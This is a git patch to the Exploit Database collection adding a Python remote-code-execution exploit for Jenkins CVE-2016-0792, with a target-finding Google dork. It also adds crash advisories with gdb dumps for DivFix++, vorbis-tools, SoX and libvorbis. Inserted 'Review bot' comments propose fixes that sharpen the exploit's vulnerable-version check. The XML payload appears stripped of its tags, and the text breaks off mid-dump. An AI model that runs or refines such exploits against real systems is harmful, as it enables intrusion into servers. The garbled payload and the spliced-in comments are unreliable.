From c116e6f563e4f7cd6a0dab50954e7964630efc42 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 1 Aug 2017 05:01:29 +0000 Subject: [PATCH] DB: 2017-08-01 7 new exploits DivFix++ 0.34 - Denial of Service Vorbis Tools oggenc 1.4.0 - '.wav' Denial of Service Sound eXchange (SoX) 14.4.2 - Multiple Vulnerabilities libvorbis 1.3.5 - Multiple Vulnerabilities libao 1.2.0 - Denial of Service Jenkins < 1.650 - Java Deserialization DiskBoss Enterprise 8.2.14 - Buffer Overflow --- files.csv | 7 + platforms/java/remote/42394.py | 93 ++++++++++ platforms/linux/dos/42396.txt | 96 +++++++++++ platforms/linux/dos/42397.txt | 65 +++++++ platforms/linux/dos/42398.txt | 270 ++++++++++++++++++++++++++++++ platforms/linux/dos/42399.txt | 187 +++++++++++++++++++++ platforms/linux/dos/42400.txt | 62 +++++++ platforms/windows/remote/42395.py | 117 +++++++++++++ 8 files changed, 897 insertions(+) create mode 100755 platforms/java/remote/42394.py create mode 100755 platforms/linux/dos/42396.txt create mode 100755 platforms/linux/dos/42397.txt create mode 100755 platforms/linux/dos/42398.txt create mode 100755 platforms/linux/dos/42399.txt create mode 100755 platforms/linux/dos/42400.txt create mode 100755 platforms/windows/remote/42395.py diff --git a/files.csv b/files.csv index 9e2bcbeec..6213b7d10 100644 --- a/files.csv +++ b/files.csv 
@@ -5629,6 +5629,11 @@ id,file,description,date,author,platform,type,port
 42389,platforms/linux/dos/42389.txt,"SoundTouch 1.9.2 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0
 42390,platforms/linux/dos/42390.txt,"LAME 3.99.5 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0
 42391,platforms/linux/dos/42391.txt,"libjpeg-turbo 1.5.1 - Denial of Service",2017-07-28,qflb.wu,linux,dos,0
+42396,platforms/linux/dos/42396.txt,"DivFix++ 0.34 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0
+42397,platforms/linux/dos/42397.txt,"Vorbis Tools oggenc 1.4.0 - '.wav' Denial of Service",2017-07-31,qflb.wu,linux,dos,0
+42398,platforms/linux/dos/42398.txt,"Sound eXchange (SoX) 14.4.2 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0
+42399,platforms/linux/dos/42399.txt,"libvorbis 1.3.5 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0
+42400,platforms/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15706,9 +15711,11 @@ id,file,description,date,author,platform,type,port
 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
 42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0
 42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0
+42394,platforms/java/remote/42394.py,"Jenkins < 1.650 - Java Deserialization",2017-07-30,"Janusz Piechówka",java,remote,0
 42354,platforms/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote,0
 42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0
 42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0
+42395,platforms/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
diff --git a/platforms/java/remote/42394.py b/platforms/java/remote/42394.py
new file mode 100755
index 000000000..00abf2e3d
--- /dev/null
+++ b/platforms/java/remote/42394.py
@@ -0,0 +1,93 @@
+import random
+import string
+from decimal import Decimal
+
+import requests
+from requests.exceptions import RequestException
+
+# Exploit Title: Jenkins CVE-2016-0792 Deserialization Remote Exploit
+# Google Dork: intitle: "Dashboard [Jenkins]" + "Manage Jenkins"
+# Date: 30-07-2017
+# Exploit Author: Janusz Piechówka
+# Github: https://github.com/jpiechowka/jenkins-cve-2016-0792
+# Vendor Homepage: https://jenkins.io/
+# Version: Versions before 1.650 and LTS before 1.642.2
+# Tested on: Debian
+# CVE : CVE-2016-0792
+
+
+def prepare_payload(command):
+ splitCommand = command.split()
+ preparedCommands = ''
+
+ for entry in splitCommand:
+ preparedCommands += f'{entry}'
+
+ xml = f'''
+
+
+
+
+
+ hashCode
+
+
+
+ {preparedCommands}
+
+ start
+
+
+
+
+ 1
+
+ '''
+
+ return xml
+
+
+def exploit(url, command):
+ print(f'[*] STARTING')
+ try:
+ print(f'[+] Trying to exploit Jenkins running at address: {url}')
+ # Perform initial URL check to see if server is online and returns correct response code using HEAD request
+ headResponse = requests.head(url, timeout=30)
+ if headResponse.status_code == requests.codes.ok:
+ print(f'[+] Server online and responding | RESPONSE: {headResponse.status_code}')
+ # Check if X-Jenkins header containing version is present then proceed
+ jenkinsVersionHeader = headResponse.headers.get('X-Jenkins')
+ if jenkinsVersionHeader is not None:
+ # Strip version after second dot from header to perform conversion to Decimal
+ stripCharacter = "."
+ strippedVersion = stripCharacter.join(jenkinsVersionHeader.split(stripCharacter)[:2])
+ # Perform basic version check
+ if Decimal(strippedVersion) < 1.650:
+ print(f'[+] Jenkins version: {Decimal(strippedVersion)} | VULNERABLE')
+ # Prepare payload
+ payload = prepare_payload(command)
+ # Prepare POST url
+ randomJobName = ''.join(random.SystemRandom().choice(string.ascii_lowercase + string.digits) for _ in range(8))
+ if url.endswith('/'):
+ postUrl = f'{url}createItem?name={randomJobName}'
+ else:
+ postUrl = f'{url}/createItem?name={randomJobName}'
+ print(f'[+] Will POST to {postUrl}')
+ # Try to execute passed command
+ postResponse = requests.post(postUrl, data=payload, headers={'Content-Type': 'application/xml'})
+ print(f'[+] Exploit launched ')
+ # 500 response code is ok here
+ print(f'[+] Response code: {postResponse.status_code} ')
+ if postResponse.status_code == 500:
+ print('[+] SUCCESS')
+ else:
+ print('[-][ERROR] EXPLOIT LAUNCHED, BUT WRONG RESPONSE CODE RETURNED')
+ else:
+ print(f'[-][ERROR] Version {Decimal(strippedVersion)} is not vulnerable')
+ else:
+ print(f'[-][ERROR] X-Jenkins header not present, check if Jenkins is actually running at {url}')
+ else:
+ print(f'[-][ERROR] {url} Server did not return success response code | RESPONSE: {headResponse.status_code}')
+ except RequestException as ex:
+ print(f'[-] [ERROR] Request exception: {ex}')
+ print('[*] FINISHED')
diff --git a/platforms/linux/dos/42396.txt b/platforms/linux/dos/42396.txt
new file mode 100755
index 000000000..97e02db4c
--- /dev/null
+++ b/platforms/linux/dos/42396.txt
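Review bot: The version gate `if Decimal(strippedVersion) < 1.650:` compares the first two components as a single decimal number, so it orders releases lexicographically rather than by component: a header of `1.7` or `1.99` evaluates to 1.7 or 1.99, is greater than 1.65, and is reported as not vulnerable, while `1.642.2`, the fixed LTS release named in the header comment, is truncated to `1.642` and reported as vulnerable. A non-numeric `X-Jenkins` value also raises `decimal.InvalidOperation`, which the `except RequestException` clause does not catch. Comparing integer tuples avoids both: `version = tuple(int(p) for p in jenkinsVersionHeader.split('.')[:3])`, `lts_fixed = version[:2] == (1, 642) and version >= (1, 642, 2)`, `if version < (1, 650) and not lts_fixed:`, with the `ValueError` handled next to the request errors. Separately, `requests.post(postUrl, ...)` carries no `timeout=` although the HEAD request does, so a half-open target hangs the script indefinitely.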
@@ -0,0 +1,96 @@ +DivFix++ denial of service vulnerability +================ +Author : qflb.wu +=============== + + +Introduction: +============= +DivFix++ is FREE AVI Video Fix & Preview program. + + +Affected version: +===== +v0.34 + + +Vulnerability Description: +========================== +the DivFixppCore::avi_header_fix function in src/DivFix++Core.cpp in DivFix++ v0.34 can cause a denial of service(invalid memory write and application crash) via a crafted avi file. + + +./DivFix++ -i DivFix++_v0.34_invalid_memory_write.avi -o out.avi + + +----debug info:---- +Program received signal SIGSEGV, Segmentation fault. +__memcpy_sse2_unaligned () + at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:167 +167../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory. +(gdb) bt +#0 __memcpy_sse2_unaligned () + at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:167 +#1 0x00000000004239d8 in DivFixppCore::avi_header_fix() () +#2 0x000000000042c0c0 in DivFixppCore::Fix(wxString, wxString, bool, bool, bool, bool) () +#3 0x000000000041404a in DivFixppApp::OnCmdLineParsed(wxCmdLineParser&) () +#4 0x0000000000414f6e in DivFixppApp::OnInit() () +#5 0x0000000000416f4f in wxAppConsoleBase::CallOnInit() () +#6 0x00007ffff6c6903c in wxEntry(int&, wchar_t**) () + from /usr/lib/x86_64-linux-gnu/libwx_baseu-3.0.so.0 +#7 0x0000000000411e70 in main () +(gdb) + + +------------------- +(gdb) disassemble 0x00000000004239b0,0x00000000004239df +Dump of assembler code from 0x4239b0 to 0x4239df: + 0x00000000004239b0 <_ZN12DivFixppCore14avi_header_fixEv+3504>:add %al,(%rax) + 0x00000000004239b2 <_ZN12DivFixppCore14avi_header_fixEv+3506>:mov %eax,%edi + 0x00000000004239b4 <_ZN12DivFixppCore14avi_header_fixEv+3508>:callq 0x434eaf <_Z17make_littleendianIiERT_S0_> + 0x00000000004239b9 <_ZN12DivFixppCore14avi_header_fixEv+3513>:mov -0x138(%rbp),%rdx + 0x00000000004239c0 <_ZN12DivFixppCore14avi_header_fixEv+3520>:mov 0x38(%rdx),%rdx + 0x00000000004239c4 
<_ZN12DivFixppCore14avi_header_fixEv+3524>:lea 0x10(%rdx),%rcx + 0x00000000004239c8 <_ZN12DivFixppCore14avi_header_fixEv+3528>:mov $0x4,%edx + 0x00000000004239cd <_ZN12DivFixppCore14avi_header_fixEv+3533>:mov %rax,%rsi + 0x00000000004239d0 <_ZN12DivFixppCore14avi_header_fixEv+3536>:mov %rcx,%rdi +=> 0x00000000004239d3 <_ZN12DivFixppCore14avi_header_fixEv+3539>:callq 0x40fcc0 + 0x00000000004239d8 <_ZN12DivFixppCore14avi_header_fixEv+3544>:mov -0x138(%rbp),%rax +---Type to continue, or q to quit--- +End of assembler dump. +(gdb) i r +rax 0x6615286690088 +rbx 0x00 +rcx 0x1016 +rdx 0x44 +rsi 0x6615286690088 +rdi 0x1016 +rbp 0x7fffffffcf100x7fffffffcf10 +rsp 0x7fffffffcdd00x7fffffffcdd0 +r8 0x8049308407344 +r9 0x7ffff7fc1a40140737353882176 +r10 0x640000006e429496729710 +r11 0x00 +r12 0x11 +r13 0x11 +r14 0x00 +r15 0x00 +rip 0x4239d30x4239d3 +eflags 0x246[ PF ZF IF ] +cs 0x3351 +ss 0x2b43 +ds 0x00 +es 0x00 +fs 0x00 +---Type to continue, or q to quit--- +gs 0x00 +(gdb) + + +POC: +DivFix++_v0.34_invalid_memory_write.avi +CVE: +CVE-2017-11330 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42396.zip diff --git a/platforms/linux/dos/42397.txt b/platforms/linux/dos/42397.txt new file mode 100755 index 000000000..aee7f044d --- /dev/null +++ b/platforms/linux/dos/42397.txt 
@@ -0,0 +1,65 @@ +vorbis-tools oggenc vulnerability +================ +Author : qflb.wu +=============== + + +Introduction: +============= +The Vorbis Tools package contains command-line tools useful for encoding, playing or editing files using the Ogg CODEC. + + +Affected version: +===== +1.4.0 + + +Vulnerability Description: +========================== +the wav_open function in oggenc/audio.c in vorbis-tools 1.4.0 can cause a denial of service(memory allocation error) via a crafted wav file. + + +./oggenc vorbis-tools_1.4.0_oggenc_memory_allocation_error.wav -o out + + +==68126==WARNING: AddressSanitizer failed to allocate 0xffffffffffffbc00 bytes +==68126==AddressSanitizer's allocator is terminating the process instead of returning 0 +==68126==If you don't like this behavior set allocator_may_return_null=1 +==68126==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_allocator.cc:149 "((0)) != (0)" (0x0, 0x0) + #0 0x46d41f in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x46d41f) + #1 0x472c81 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x472c81) + #2 0x4719c0 in __sanitizer::AllocatorReturnNull() (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x4719c0) + #3 0x4674b6 in __interceptor_malloc (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x4674b6) + #4 0x492896 in wav_open /home/a/Downloads/vorbis-tools-1.4.0/oggenc/audio.c:573 + #5 0x496d8e in open_audio_file /home/a/Downloads/vorbis-tools-1.4.0/oggenc/audio.c:86 + #6 0x485d0a in main /home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc.c:256 + #7 0x7f6d9f8dcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4) + #8 0x47d55c in _start (/home/a/Downloads/vorbis-tools-1.4.0/oggenc/oggenc+0x47d55c) + + + ----------------- +wav->channel_permute 
= malloc(wav->channels * sizeof(int)); +if (wav->channels <= 8) + /* Where we know the mappings, use them. */ + memcpy(wav->channel_permute, wav_permute_matrix[wav->channels-1], + sizeof(int) * wav->channels); +else + /* Use a default 1-1 mapping */ + for (i=0; i < wav->channels; i++) + wav->channel_permute[i] = i; + + +return 1; + + +Andthe code didn't check the return of malloc. + + +POC: +vorbis-tools_1.4.0_oggenc_memory_allocation_error.wav +CVE: +CVE-2017-11331 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42397.zip diff --git a/platforms/linux/dos/42398.txt b/platforms/linux/dos/42398.txt new file mode 100755 index 000000000..0a4cd58c9 --- /dev/null +++ b/platforms/linux/dos/42398.txt 
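Review bot: The root-cause sentence `Andthe code didn't check the return of malloc.` understates the bug: the sanitizer shows malloc being asked for 0xffffffffffffbc00 bytes from `malloc(wav->channels * sizeof(int))`, which means the channel count taken from the WAV header is negative or out of range by the time it reaches the allocation, so a NULL check on malloc alone would only turn the abort into a clean error exit. Unless wav_open rejects it earlier (not shown here), a channel count of 0 would also pass the `if (wav->channels <= 8)` branch and index `wav_permute_matrix[wav->channels-1]` with -1. A practitioner wants the fix stated as bounding the header's channel count before it is used to size the allocation, e.g. `the channel count read from the WAV header is not validated before it sizes the channel_permute allocation`; the typo `Andthe` should read `And the`.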
@@ -0,0 +1,270 @@ +Sound eXchange (SoX) multiple vulnerabilities +================ +Author : qflb.wu +=============== + + +Introduction: +============= +SoX is a cross-platform (Windows, Linux, MacOS X, etc.) command line utility that can convert various formats of computer audio files in to other formats. It can also apply various effects to these sound files, and, as an added bonus, SoX can play and record audio files on most platforms. + + +Affected version: +===== +14.4.2 + + +Vulnerability Description: +========================== +1. +the startread function in wav.c in Sound eXchange(SoX) 14.4.2 can cause a denial of service(divide-by-zero error and application crash) via a crafted wav file. + + +./sox sox_14.4.2_divide_by_zero_error_1.wav out.ogg + + +----debug info:---- +Program received signal SIGFPE, Arithmetic exception. +0x00007ffff7b9c829 in startread (ft=0x611540) at wav.c:950 +950 wav->numSamples = div_bits(qwDataLength, ft->encoding.bits_per_sample) / ft->signal.channels; +(gdb) disassemble 0x00007ffff7b9c829,0x00007ffff7b9c8ff +Dump of assembler code from 0x7ffff7b9c829 to 0x7ffff7b9c8ff: +=> 0x00007ffff7b9c829 :div %rcx + 0x00007ffff7b9c82c :mov %rax,0x0(%rbp) + 0x00007ffff7b9c830 :imul %rcx,%rax + 0x00007ffff7b9c834 :mov %rax,0x18(%rbx) + 0x00007ffff7b9c838 :mov 0x28(%rbp),%r8d + 0x00007ffff7b9c83c :test %r8d,%r8d + 0x00007ffff7b9c83f :je 0x7ffff7b9c849 + 0x00007ffff7b9c841 :movq $0x0,0x18(%rbx) + 0x00007ffff7b9c849 :mov %r9d,0x14(%rsp) + 0x00007ffff7b9c84e :mov %edi,0x10(%rsp) + 0x00007ffff7b9c852 :callq 0x7ffff7b50390 + 0x00007ffff7b9c857 :cmpw $0x1,0x22(%rsp) + 0x00007ffff7b9c85d :lea 0x241fa(%rip),%rdx # 0x7ffff7bc0a5e + 0x00007ffff7b9c864 :mov 0x10(%rsp),%edi + 0x00007ffff7b9c868 :mov 0x30(%rsp),%r8d + 0x00007ffff7b9c86d :lea 0x1de3a(%rip),%rcx # 0x7ffff7bba6ae + 0x00007ffff7b9c874 :mov %rdx,0x40(%rax) + 0x00007ffff7b9c878 :lea 0x115e7(%rip),%rax # 0x7ffff7bade66 +---Type to continue, or q to quit---q +End of assembler dump. 
+(gdb) i r +rax 0x5371335 +rbx 0x6115406362432 +rcx 0x00 +rdx 0x00 +rsi 0x88 +rdi 0x11 +rbp 0x611a600x611a60 +rsp 0x7fffffffdc000x7fffffffdc00 +r8 0x7ffff7fce7c0140737353934784 +r9 0x00 +r10 0x7fffffffd9c0140737488345536 +r11 0x7ffff72cca80140737340295808 +r12 0x5371335 +r13 0x7fffffffdc50140737488346192 +r14 0x7fffffffdc40140737488346176 +r15 0x00 +rip 0x7ffff7b9c8290x7ffff7b9c829 +eflags 0x10246[ PF ZF IF RF ] +cs 0x3351 +ss 0x2b43 +ds 0x00 +es 0x00 +fs 0x00 +gs 0x00 +(gdb) + + +POC: +sox_14.4.2_divide_by_zero_error_1.wav +CVE: +CVE-2017-11332 + + +2. +the read_samples function in hcom.c in Sound eXchange(SoX) 14.4.2 can cause a denial of service(invalid memory read and application crash) via a crafted hcom file. + + +./sox sox_14.4.2_invalid_memory_read.hcom out.wav + + +----debug info:---- +Program received signal SIGSEGV, Segmentation fault. +read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215 +215 if(p->dictionary[p->dictentry].dict_leftson < 0) { +(gdb) bt +#0 read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215 +#1 0x00007ffff7b58409 in sox_read (ft=ft@entry=0x611590, buf=, + len=8192) at formats.c:978 +#2 0x0000000000409dd4 in sox_read_wide (ft=0x611590, buf=, + max=) at sox.c:490 +#3 0x000000000040a32e in combiner_drain (effp=0x614410, obuf=0x6145f0, + osamp=0x7fffffffdbb0) at sox.c:552 +#4 0x00007ffff7b68c0d in drain_effect (n=0, chain=0x614260) at effects.c:352 +#5 sox_flow_effects (chain=0x614260, + callback=callback@entry=0x405a80 , + client_data=client_data@entry=0x0) at effects.c:445 +#6 0x0000000000407bf6 in process () at sox.c:1802 +#7 0x0000000000403085 in main (argc=3, argv=0x7fffffffdf98) at sox.c:3008 +(gdb) disassemble +Dump of assembler code for function read_samples: + 0x00007ffff7b93900 <+0>:push %r15 + 0x00007ffff7b93902 <+2>:push %r14 + 0x00007ffff7b93904 <+4>:mov %rsi,%r14 + 0x00007ffff7b93907 <+7>:push %r13 + 0x00007ffff7b93909 <+9>:push %r12 + 0x00007ffff7b9390b <+11>:push %rbp + 0x00007ffff7b9390c <+12>:push 
%rbx + 0x00007ffff7b9390d <+13>:mov %rdi,%rbx + 0x00007ffff7b93910 <+16>:sub $0x28,%rsp + 0x00007ffff7b93914 <+20>:mov 0x2d0(%rdi),%r15 + 0x00007ffff7b9391b <+27>:mov 0x24(%r15),%esi + 0x00007ffff7b9391f <+31>:test %esi,%esi + 0x00007ffff7b93921 <+33>:js 0x7ffff7b93a60 + 0x00007ffff7b93927 <+39>:mov 0x10(%r15),%rdi + 0x00007ffff7b9392b <+43>:xor %eax,%eax + 0x00007ffff7b9392d <+45>:lea (%rax,%rdx,1),%r13d + 0x00007ffff7b93931 <+49>:lea 0x28(%r15),%rbp + 0x00007ffff7b93935 <+53>:mov %rdx,%r12 + 0x00007ffff7b93938 <+56>:lea 0x1(%r13),%eax + 0x00007ffff7b9393c <+60>:mov %eax,0xc(%rsp) + 0x00007ffff7b93940 <+64>:mov %r13d,%eax + 0x00007ffff7b93943 <+67>:mov %r12d,0x8(%rsp) +---Type to continue, or q to quit--- + 0x00007ffff7b93948 <+72>:sub %r12d,%eax + 0x00007ffff7b9394b <+75>:mov %eax,(%rsp) + 0x00007ffff7b9394e <+78>:jmp 0x7ffff7b93989 + 0x00007ffff7b93950 <+80>:lea -0x1(%rax),%r8d + 0x00007ffff7b93954 <+84>:movslq 0x20(%r15),%rax + 0x00007ffff7b93958 <+88>:mov 0x28(%r15),%edx + 0x00007ffff7b9395c <+92>:mov (%r15),%rsi + 0x00007ffff7b9395f <+95>:shl $0x4,%rax + 0x00007ffff7b93963 <+99>:test %edx,%edx + 0x00007ffff7b93965 <+101>:js 0x7ffff7b939e0 + 0x00007ffff7b93967 <+103>:movswq 0x8(%rsi,%rax,1),%rax + 0x00007ffff7b9396d <+109>:mov %eax,0x20(%r15) + 0x00007ffff7b93971 <+113>:shl $0x4,%rax + 0x00007ffff7b93975 <+117>:add %edx,%edx + 0x00007ffff7b93977 <+119>:mov %r8d,0x24(%r15) + 0x00007ffff7b9397b <+123>:add %rsi,%rax + 0x00007ffff7b9397e <+126>:mov %edx,0x28(%r15) +=> 0x00007ffff7b93982 <+130>:cmpw $0x0,0x8(%rax) + 0x00007ffff7b93987 <+135>:js 0x7ffff7b939f0 + 0x00007ffff7b93989 <+137>:test %rdi,%rdi + 0x00007ffff7b9398c <+140>:jle 0x7ffff7b93a48 + 0x00007ffff7b93992 <+146>:mov 0x24(%r15),%eax + 0x00007ffff7b93996 <+150>:test %eax,%eax +---Type to continue, or q to quit---q +Quit +(gdb) i r +rax 0x631b306495024 +rbx 0x6115906362512 +rcx 0x11 +rdx 0x6900006881280 +rsi 0x611b206363936 +rdi 0x5241316 +rbp 0x611ad80x611ad8 +rsp 0x7fffffffda300x7fffffffda30 +r8 0x1016 
+r9 0x7ffff7fce7c0140737353934784 +r10 0x7fffffffd7f0140737488345072 +r11 0x7ffff72cb2e0140737340289760 +r12 0x1ff98185 +r13 0x20008192 +r14 0x61460c6374924 +r15 0x611ab06363824 +rip 0x7ffff7b939820x7ffff7b93982 +eflags 0x10206[ PF IF RF ] +cs 0x3351 +ss 0x2b43 +ds 0x00 +es 0x00 +fs 0x00 +---Type to continue, or q to quit---q +Quit +(gdb) x/20x $rax+8 +0x631b38:Cannot access memory at address 0x631b38 +(gdb) + + +POC: +sox_14.4.2_invalid_memory_read.hcom +CVE: +CVE-2017-11358 + + +3. +the wavwritehdr function in wav.c in Sound eXchange(SoX) 14.4.2 allows remote attackers to cause a denial of service(divide-by-zero error and application crash) via a crafted snd file which convert to wav file. + + +./sox sox_14.4.2_divide_by_zero_error_2.snd out.wav + + +----debug info:---- +Program received signal SIGFPE, Arithmetic exception. +0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, + second_header=second_header@entry=0) at wav.c:1457 +1457 blocksWritten = MS_UNSPEC/wBlockAlign; +(gdb) bt +#0 0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, + second_header=second_header@entry=0) at wav.c:1457 +#1 0x00007ffff7b9c0e9 in startwrite (ft=0x611bf0) at wav.c:1252 +#2 0x00007ffff7b59e32 in open_write ( + path=path@entry=0x611bc0 "/home/a/Documents/out.wav", + buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, + buffer_ptr=buffer_ptr@entry=0x0, + buffer_size_ptr=buffer_size_ptr@entry=0x0, signal=signal@entry=0x611410, + encoding=encoding@entry=0x611430, filetype=0x611bd6 "wav", + oob=oob@entry=0x7fffffffdcd0, + overwrite_permitted=overwrite_permitted@entry=0x409ce0 ) at formats.c:912 +#3 0x00007ffff7b5a5e8 in sox_open_write ( + path=path@entry=0x611bc0 "/home/a/Documents/out.wav", + signal=signal@entry=0x611410, encoding=encoding@entry=0x611430, + filetype=, oob=oob@entry=0x7fffffffdcd0, + overwrite_permitted=overwrite_permitted@entry=0x409ce0 ) at formats.c:948 +#4 0x000000000040847a in open_output_file () at sox.c:1557 +#5 process () at sox.c:1754 +#6 
0x0000000000403085 in main (argc=3, argv=0x7fffffffdfa8) at sox.c:3008 +(gdb) disassemble 0x00007ffff7b9a97b,0x00007ffff7b9a9ff +Dump of assembler code from 0x7ffff7b9a97b to 0x7ffff7b9a9ff: +=> 0x00007ffff7b9a97b :idivl 0x10(%rsp) + 0x00007ffff7b9a97f :movslq %eax,%rcx + 0x00007ffff7b9a982 :imul %eax,%r12d + 0x00007ffff7b9a986 :mov %rcx,0x48(%rsp) + 0x00007ffff7b9a98b :imul %r14d,%eax + 0x00007ffff7b9a98f :cmp $0x31,%bp + 0x00007ffff7b9a993 :mov %eax,0x40(%rsp) + 0x00007ffff7b9a997 :je 0x7ffff7b9aff0 + 0x00007ffff7b9a99d :cmp $0x1,%bp + 0x00007ffff7b9a9a1 :je 0x7ffff7b9b0a8 + 0x00007ffff7b9a9a7 :movzwl 0x3e(%rsp),%eax + 0x00007ffff7b9a9ac :movl $0x0,0x34(%rsp) + 0x00007ffff7b9a9b4 :lea 0x12(%rax),%r13d + 0x00007ffff7b9a9b8 :mov %r12d,%eax + 0x00007ffff7b9a9bb :and $0x1,%eax + 0x00007ffff7b9a9be :movzwl %r13w,%r13d + 0x00007ffff7b9a9c2 :lea (%r12,%r13,1),%edx + 0x00007ffff7b9a9c6 :add %edx,%eax + 0x00007ffff7b9a9c8 :cmp $0x1,%bp + 0x00007ffff7b9a9cc :setne 0x3d(%rsp) +---Type to continue, or q to quit---q +Quit +(gdb) x/10gx $rsp+10 +0x7fffffffdaaa:0x00000000000000000x0056000000000000 +0x7fffffffdaba:0x00010000000000d40x0001000000000000 +0x7fffffffdaca:0x00000000000800000x0000000000000008 +0x7fffffffdada:0x0fe000007fff00000x876000007ffff7bc +0x7fffffffdaea:0x00d000007ffff7610x21a0000000000000 +(gdb) + + +POC: +sox_14.4.2_divide_by_zero_error_2.snd +CVE: +CVE-2017-11359 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42398.zip diff --git a/platforms/linux/dos/42399.txt b/platforms/linux/dos/42399.txt new file mode 100755 index 000000000..602fb877e --- /dev/null +++ b/platforms/linux/dos/42399.txt 
@@ -0,0 +1,187 @@ +libvorbis multiple vulnerabilities +================ +Author : qflb.wu +=============== + + +Introduction: +============= +The libvorbis package contains a general purpose audio and music encoding format. This is useful for creating (encoding) and playing (decoding) sound in an open (patent free) format. + + +Affected version: +===== +1.3.5 + + +Vulnerability Description: +========================== +1. +the vorbis_analysis_wrote function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service(OOM) via a crafted wav file. + + +I found this bug when I test Sound eXchange(SoX) 14.4.2 which used the libvorbis library. + + +./sox libvorbis_1.3.5_OOM.wav out.ogg + + +/var/log/syslog info: + Jul 13 19:58:05 ubuntu kernel: [] Out of memory: Kill process 44203 (sox) score 364 or sacrifice child +Jul 13 19:58:05 ubuntu kernel: [] Killed process 44203 (sox) total-vm:1831804kB, anon-rss:599932kB, file-rss:40kB + + +----debug info:---- +#0 0x00007ffff5df5e92 in vorbis_analysis_wrote () +from /usr/local/lib/libvorbis.so.0 +#1 0x00007ffff7ba1cba in write_samples (ft=0x611c20, buf=buf@entry=0x0, + len=len@entry=0x0) at vorbis.c:358 +#2 0x00007ffff7ba1dc5 in stopwrite (ft=) at vorbis.c:398 +#3 0x00007ffff7b58488 in sox_close (ft=0x611c20) at formats.c:1006 +#4 0x0000000000405fa8 in cleanup () at sox.c:246 +#5 0x0000000000403479 in main (argc=argc@entry=0x3, + argv=argv@entry=0x7fffffffe5e8) at sox.c:3050 +#6 0x00007ffff727bec5 in __libc_start_main (main=0x4029c0
, argc=0x3, + argv=0x7fffffffe5e8, init=, fini=, + rtld_fini=, stack_end=0x7fffffffe5d8) at libc-start.c:287 +#7 0x0000000000403c65 in _start () +-------- +Program terminated with signal SIGKILL, Killed. +The program no longer exists. + + +POC: +libvorbis_1.3.5_OOM.wav +CVE: +CVE-2017-11333 + + +2. +the vorbis_block_clear function in lib/block.c in Xiph.Org libvorbis 1.3.5 can cause a denial of service(NULL pointer dereference and application crash) via a crafted ogg file. + + +I found this bug when I test mp3splt 2.6.2 which used the libvorbis library. + + +./mp3splt -P -t 0.9 libvorbis_1.3.5_null_pointer_dereference.ogg + + +----debug info:---- +0x00007ffff61752c0 in vorbis_block_clear () from /usr/local/lib/libvorbis.so.0 +(gdb) disassemble +Dump of assembler code for function vorbis_block_clear: + 0x00007ffff61752a0 <+0>:push %r14 + 0x00007ffff61752a2 <+2>:mov 